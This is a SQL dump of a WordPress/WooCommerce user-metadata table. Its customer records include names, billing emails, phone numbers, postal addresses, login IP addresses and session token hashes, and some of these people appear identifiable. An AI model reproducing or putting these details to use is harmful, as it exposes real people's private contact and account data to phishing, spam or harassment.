INSERT INTO `wp_usermeta` VALUES (10321, 638, '_yoast_wpseo_profile_updated', '1491663094'); 
INSERT INTO `wp_usermeta` VALUES (10322, 638, 'session_tokens', 'a:2:{s:64:"95645d09725cf2a1a27a983a35b8ecd91294f8f812bb18732c6aed5b75d3a4c1";a:4:{s:10:"expiration";i:1492872703;s:2:"ip";s:13:"132.103.253.2";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36";s:5:"login";i:1491663103;}s:64:"61c2324a4c4f6e27bd25a312108dd1a826008851aaba425994cedf35ac1c99ea";a:4:{s:10:"expiration";i:1491839980;s:2:"ip";s:13:"132.103.253.2";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36";s:5:"login";i:1491667180;}}'); 
INSERT INTO `wp_usermeta` VALUES (10323, 638, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (10324, 639, 'nickname', 'artaj.re'); 
INSERT INTO `wp_usermeta` VALUES (10325, 639, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10326, 639, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10327, 639, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10328, 639, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10329, 639, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10330, 639, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10331, 639, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10332, 639, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10333, 639, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10334, 639, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10335, 639, '_yoast_wpseo_profile_updated', '1491669707'); 
INSERT INTO `wp_usermeta` VALUES (10336, 639, 'session_tokens', 'a:1:{s:64:"e48787bace63f01e207c98debcb5e32843b5d45d2c25485842943cdbfd1d1743";a:4:{s:10:"expiration";i:1492879317;s:2:"ip";s:14:"151.254.81.236";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36";s:5:"login";i:1491669717;}}'); 
INSERT INTO `wp_usermeta` VALUES (10337, 639, 'billing_first_name', 'artaj for trading co'); 
INSERT INTO `wp_usermeta` VALUES (10338, 639, 'billing_last_name', 'CO'); 
INSERT INTO `wp_usermeta` VALUES (10339, 639, 'billing_company', 'artaj for trading co'); 
INSERT INTO `wp_usermeta` VALUES (10340, 639, 'billing_email', 'artaj.re@gmail.com'); 
INSERT INTO `wp_usermeta` VALUES (10341, 639, 'billing_phone', '+966564883161'); 
INSERT INTO `wp_usermeta` VALUES (10342, 639, 'billing_country', 'SA'); 
INSERT INTO `wp_usermeta` VALUES (10343, 639, 'billing_address_1', 'alhasan'); 
INSERT INTO `wp_usermeta` VALUES (10344, 639, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (10345, 639, 'billing_city', 'riyadh'); 
INSERT INTO `wp_usermeta` VALUES (10346, 639, 'billing_state', 'riyadh'); 
INSERT INTO `wp_usermeta` VALUES (10347, 639, 'billing_postcode', '13245'); 
INSERT INTO `wp_usermeta` VALUES (10349, 640, 'nickname', 'cnf500'); 
INSERT INTO `wp_usermeta` VALUES (10350, 640, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10351, 640, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10352, 640, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10353, 640, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10354, 640, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10355, 640, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10356, 640, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10357, 640, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10358, 640, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10359, 640, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10360, 640, '_yoast_wpseo_profile_updated', '1491692944'); 
INSERT INTO `wp_usermeta` VALUES (10361, 640, 'session_tokens', 'a:1:{s:64:"1b92a0e35d43fb2d38ae9af25c7cb0f3723c3b966ad3d9d41284c31c572b53c5";a:4:{s:10:"expiration";i:1492902554;s:2:"ip";s:12:"71.11.72.165";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0";s:5:"login";i:1491692954;}}'); 
INSERT INTO `wp_usermeta` VALUES (10364, 641, 'nickname', 'info3'); 
INSERT INTO `wp_usermeta` VALUES (10365, 641, 'first_name', 'S'); 
INSERT INTO `wp_usermeta` VALUES (10366, 641, 'last_name', 'N'); 
INSERT INTO `wp_usermeta` VALUES (10367, 641, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10368, 641, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10369, 641, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10370, 641, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10371, 641, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10372, 641, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10373, 641, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10374, 641, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10375, 641, '_yoast_wpseo_profile_updated', '1491730510'); 
INSERT INTO `wp_usermeta` VALUES (10376, 641, 'session_tokens', 'a:1:{s:64:"539373d068530cb3806eb847878c7e21495f3870a097f36a39e76b3316fc16ea";a:4:{s:10:"expiration";i:1492940119;s:2:"ip";s:11:"94.48.71.80";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1491730519;}}'); 
INSERT INTO `wp_usermeta` VALUES (10377, 641, 'billing_first_name', 'S'); 
INSERT INTO `wp_usermeta` VALUES (10378, 641, 'billing_last_name', 'N'); 
INSERT INTO `wp_usermeta` VALUES (10379, 641, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (10380, 641, 'billing_email', 'info@bolad.sa'); 
INSERT INTO `wp_usermeta` VALUES (10381, 641, 'billing_phone', '555222384'); 
INSERT INTO `wp_usermeta` VALUES (10382, 641, 'billing_country', 'SA'); 
INSERT INTO `wp_usermeta` VALUES (10383, 641, 'billing_address_1', 'PO Box 60991'); 
INSERT INTO `wp_usermeta` VALUES (10384, 641, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (10385, 641, 'billing_city', 'Riyadh'); 
INSERT INTO `wp_usermeta` VALUES (10386, 641, 'billing_state', 'Riyadh'); 
INSERT INTO `wp_usermeta` VALUES (10387, 641, 'billing_postcode', '11555'); 
INSERT INTO `wp_usermeta` VALUES (10388, 641, 'last_update', '1491730623'); 
INSERT INTO `wp_usermeta` VALUES (10389, 641, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (10390, 640, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (10391, 642, 'nickname', 'cwatts'); 
INSERT INTO `wp_usermeta` VALUES (10392, 642, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10393, 642, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10394, 642, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10395, 642, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10396, 642, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10397, 642, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10398, 642, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10399, 642, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10400, 642, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10401, 642, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10402, 642, '_yoast_wpseo_profile_updated', '1491796511'); 
INSERT INTO `wp_usermeta` VALUES (10403, 642, 'session_tokens', 'a:1:{s:64:"8ea0593c96ffc7c670ff98655fb4b7815226ba09a71324ff8eb17981f00891c7";a:4:{s:10:"expiration";i:1498983782;s:2:"ip";s:15:"103.232.232.132";s:2:"ua";s:102:"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36";s:5:"login";i:1498810982;}}'); 
INSERT INTO `wp_usermeta` VALUES (10406, 643, 'nickname', 'mcastelo'); 
INSERT INTO `wp_usermeta` VALUES (10407, 643, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10408, 643, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10409, 643, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10410, 643, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10411, 643, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10412, 643, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10413, 643, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10414, 643, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10415, 643, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10416, 643, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10417, 643, '_yoast_wpseo_profile_updated', '1491846416'); 
INSERT INTO `wp_usermeta` VALUES (10418, 643, 'session_tokens', 'a:1:{s:64:"43a5fb47b242ec997378dca6a706c7a3d5dcbcb9452b96b756d573eebba94fa5";a:4:{s:10:"expiration";i:1493056026;s:2:"ip";s:15:"104.129.196.203";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36";s:5:"login";i:1491846426;}}'); 
INSERT INTO `wp_usermeta` VALUES (10419, 644, 'nickname', 'lois'); 
INSERT INTO `wp_usermeta` VALUES (10420, 644, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10421, 644, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10422, 644, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10423, 644, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10424, 644, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10425, 644, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10426, 644, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10427, 644, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10428, 644, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10429, 644, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10430, 644, '_yoast_wpseo_profile_updated', '1491847451'); 
INSERT INTO `wp_usermeta` VALUES (10431, 644, 'session_tokens', 'a:1:{s:64:"d4421331f238a12166633d6913649074ecd02a9bf7b0f8c3362da808cd22324e";a:4:{s:10:"expiration";i:1502396054;s:2:"ip";s:15:"173.209.110.203";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36";s:5:"login";i:1502223254;}}'); 
INSERT INTO `wp_usermeta` VALUES (10432, 645, 'nickname', 'lhannam'); 
INSERT INTO `wp_usermeta` VALUES (10433, 645, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10434, 645, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10435, 645, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10436, 645, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10437, 645, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10438, 645, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10439, 645, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10440, 645, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10441, 645, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10442, 645, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10443, 645, '_yoast_wpseo_profile_updated', '1491853731'); 
INSERT INTO `wp_usermeta` VALUES (10444, 645, 'session_tokens', 'a:1:{s:64:"b8cfdef78828b9418b000a48fabef85e7d156b3a0a354514b333214b89df4ca1";a:4:{s:10:"expiration";i:1493063340;s:2:"ip";s:13:"65.95.228.161";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1491853740;}}'); 
INSERT INTO `wp_usermeta` VALUES (10445, 645, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (10446, 646, 'nickname', 'tom.vancleave'); 
INSERT INTO `wp_usermeta` VALUES (10447, 646, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10448, 646, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10449, 646, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10450, 646, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10451, 646, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10452, 646, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10453, 646, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10454, 646, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10455, 646, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10456, 646, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10457, 646, '_yoast_wpseo_profile_updated', '1491921639'); 
INSERT INTO `wp_usermeta` VALUES (10458, 646, 'session_tokens', 'a:1:{s:64:"d8c8a9c6f85cfc81c61c088d689b7cfe54916b83624964f44048edefcb5293dd";a:4:{s:10:"expiration";i:1493131253;s:2:"ip";s:13:"192.31.106.35";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1491921653;}}'); 
INSERT INTO `wp_usermeta` VALUES (10459, 647, 'nickname', 'klragsdale1954'); 
INSERT INTO `wp_usermeta` VALUES (10460, 647, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10461, 647, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10462, 647, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10463, 647, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10464, 647, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10465, 647, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10466, 647, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10467, 647, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10468, 647, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10469, 647, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10470, 647, '_yoast_wpseo_profile_updated', '1491922939'); 
INSERT INTO `wp_usermeta` VALUES (10471, 647, 'session_tokens', 'a:1:{s:64:"53a770e6f1ccdabdd10653cb358770c534adb4d79cb117a964528f3b3880fbe1";a:4:{s:10:"expiration";i:1493132549;s:2:"ip";s:13:"162.58.112.25";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1491922949;}}'); 
INSERT INTO `wp_usermeta` VALUES (10472, 648, 'nickname', 'jclark'); 
INSERT INTO `wp_usermeta` VALUES (10473, 648, 'first_name', 'Jillian'); 
INSERT INTO `wp_usermeta` VALUES (10474, 648, 'last_name', 'Esposito'); 
INSERT INTO `wp_usermeta` VALUES (10475, 648, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10476, 648, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10477, 648, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10478, 648, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10479, 648, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10480, 648, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10481, 648, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10482, 648, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10483, 648, '_yoast_wpseo_profile_updated', '1491925218'); 
INSERT INTO `wp_usermeta` VALUES (10484, 648, 'session_tokens', 'a:1:{s:64:"0f2755cb193d467e42e09eb450e839a08a5e44015400ff2a5ec5de98caa40051";a:4:{s:10:"expiration";i:1493134828;s:2:"ip";s:12:"208.85.168.8";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36";s:5:"login";i:1491925228;}}'); 
INSERT INTO `wp_usermeta` VALUES (10485, 648, 'billing_first_name', 'Jillian'); 
INSERT INTO `wp_usermeta` VALUES (10486, 648, 'billing_last_name', 'Esposito'); 
INSERT INTO `wp_usermeta` VALUES (10487, 648, 'billing_company', 'Pipette Calibration Services, Inc'); 
INSERT INTO `wp_usermeta` VALUES (10488, 648, 'billing_email', 'jclark@pipettecal.com'); 
INSERT INTO `wp_usermeta` VALUES (10489, 648, 'billing_phone', '617-964-0039'); 
INSERT INTO `wp_usermeta` VALUES (10490, 648, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (10491, 648, 'billing_address_1', '150 Wells Avenue'); 
INSERT INTO `wp_usermeta` VALUES (10492, 648, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (10493, 648, 'billing_city', 'Newton'); 
INSERT INTO `wp_usermeta` VALUES (10494, 648, 'billing_state', 'MA'); 
INSERT INTO `wp_usermeta` VALUES (10495, 648, 'billing_postcode', '02459'); 
INSERT INTO `wp_usermeta` VALUES (10496, 648, 'last_update', '1491925285'); 
INSERT INTO `wp_usermeta` VALUES (10498, 649, 'nickname', 'DAVID63MORANO'); 
INSERT INTO `wp_usermeta` VALUES (10499, 649, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10500, 649, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10501, 649, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10502, 649, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10503, 649, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10504, 649, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10505, 649, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10506, 649, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10507, 649, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10508, 649, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10509, 649, '_yoast_wpseo_profile_updated', '1491929590'); 
INSERT INTO `wp_usermeta` VALUES (10510, 649, 'session_tokens', 'a:1:{s:64:"4d957fe4af4e2892be559731cfa0cb04d76e72516b5b3436617867b937281fa2";a:4:{s:10:"expiration";i:1493139199;s:2:"ip";s:14:"192.234.93.254";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1491929599;}}'); 
INSERT INTO `wp_usermeta` VALUES (10511, 650, 'nickname', 'vveilleux'); 
INSERT INTO `wp_usermeta` VALUES (10512, 650, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10513, 650, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10514, 650, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10515, 650, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10516, 650, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10517, 650, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10518, 650, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10519, 650, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10520, 650, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10521, 650, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10522, 650, '_yoast_wpseo_profile_updated', '1492007207'); 
INSERT INTO `wp_usermeta` VALUES (10523, 650, 'session_tokens', 'a:1:{s:64:"5ae8a8fe975bad059ce759b3f9c87fed6f0e6c9c3717c1a9ca071b39ec6c2170";a:4:{s:10:"expiration";i:1493216816;s:2:"ip";s:12:"24.37.209.50";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1492007216;}}'); 
INSERT INTO `wp_usermeta` VALUES (10524, 651, 'nickname', 'fds'); 
INSERT INTO `wp_usermeta` VALUES (10525, 651, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10526, 651, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10527, 651, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10528, 651, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10529, 651, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10530, 651, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10531, 651, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10532, 651, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10533, 651, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10534, 651, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10535, 651, '_yoast_wpseo_profile_updated', '1492007467'); 
INSERT INTO `wp_usermeta` VALUES (10536, 651, 'session_tokens', 'a:1:{s:64:"cc1d1f80b4702d931491bebee3817dc901f0a2aab489c85520d6a04a6afdb67c";a:4:{s:10:"expiration";i:1493217076;s:2:"ip";s:13:"62.102.228.48";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36";s:5:"login";i:1492007476;}}'); 
INSERT INTO `wp_usermeta` VALUES (10537, 651, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (10538, 652, 'nickname', 'nigel.vieira'); 
INSERT INTO `wp_usermeta` VALUES (10539, 652, 'first_name', 'nigel'); 
INSERT INTO `wp_usermeta` VALUES (10540, 652, 'last_name', 'vieira'); 
INSERT INTO `wp_usermeta` VALUES (10541, 652, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10542, 652, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10543, 652, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10544, 652, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10545, 652, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10546, 652, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10547, 652, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10548, 652, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10549, 652, '_yoast_wpseo_profile_updated', '1492009277'); 
INSERT INTO `wp_usermeta` VALUES (10550, 652, 'session_tokens', 'a:1:{s:64:"b77f46e71cd8c2620051af4ef04932690cdfc3c44a246e16eb10e304987fd5d1";a:4:{s:10:"expiration";i:1493218886;s:2:"ip";s:12:"158.26.2.162";s:2:"ua";s:75:"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko";s:5:"login";i:1492009286;}}'); 
INSERT INTO `wp_usermeta` VALUES (10551, 652, 'last_update', '1492009456'); 
INSERT INTO `wp_usermeta` VALUES (10552, 652, 'billing_first_name', 'nigel'); 
INSERT INTO `wp_usermeta` VALUES (10553, 652, 'billing_last_name', 'vieira'); 
INSERT INTO `wp_usermeta` VALUES (10554, 652, 'billing_company', 'EXXONMOBIL UPSTREAM RESEARCH COMPANY'); 
INSERT INTO `wp_usermeta` VALUES (10555, 652, 'billing_email', 'nigel.vieira@exxonmobil.com'); 
INSERT INTO `wp_usermeta` VALUES (10556, 652, 'billing_phone', '8326253687'); 
INSERT INTO `wp_usermeta` VALUES (10557, 652, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (10558, 652, 'billing_address_1', 'po BOX 1969'); 
INSERT INTO `wp_usermeta` VALUES (10559, 652, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (10560, 652, 'billing_city', 'HOUSTON'); 
INSERT INTO `wp_usermeta` VALUES (10561, 652, 'billing_state', 'TX'); 
INSERT INTO `wp_usermeta` VALUES (10562, 652, 'billing_postcode', '77251-1969'); 
INSERT INTO `wp_usermeta` VALUES (10563, 652, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (10565, 653, 'nickname', 'thomas.sajtar'); 
INSERT INTO `wp_usermeta` VALUES (10566, 653, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10567, 653, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10568, 653, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10569, 653, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10570, 653, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (10571, 653, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (10572, 653, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (10573, 653, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10574, 653, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (10575, 653, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (10576, 653, '_yoast_wpseo_profile_updated', '1492022862'); 
INSERT INTO `wp_usermeta` VALUES (10578, 653, 'billing_first_name', 'thomas'); 
INSERT INTO `wp_usermeta` VALUES (10579, 653, 'billing_last_name', 'Sajtar'); 
INSERT INTO `wp_usermeta` VALUES (10580, 653, 'billing_company', 'DLA Logistics Information Service'); 
INSERT INTO `wp_usermeta` VALUES (10581, 653, 'billing_email', 'thomas.sajtar@dla.mil'); 
INSERT INTO `wp_usermeta` VALUES (10582, 653, 'billing_phone', '269-961-5163'); 
INSERT INTO `wp_usermeta` VALUES (10583, 653, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (10584, 653, 'billing_address_1', '74 N. washington st.'); 
INSERT INTO `wp_usermeta` VALUES (10585, 653, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (10586, 653, 'billing_city', 'battle creek'); 
INSERT INTO `wp_usermeta` VALUES (10587, 653, 'billing_state', 'MI'); 
INSERT INTO `wp_usermeta` VALUES (10588, 653, 'billing_postcode', '49017'); 
INSERT INTO `wp_usermeta` VALUES (10589, 653, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (10590, 654, 'nickname', 'amarine'); 
INSERT INTO `wp_usermeta` VALUES (10591, 654, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10592, 654, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (10593, 654, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (10594, 654, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (10595, 654, 'comment_shortcuts', 'false'); 
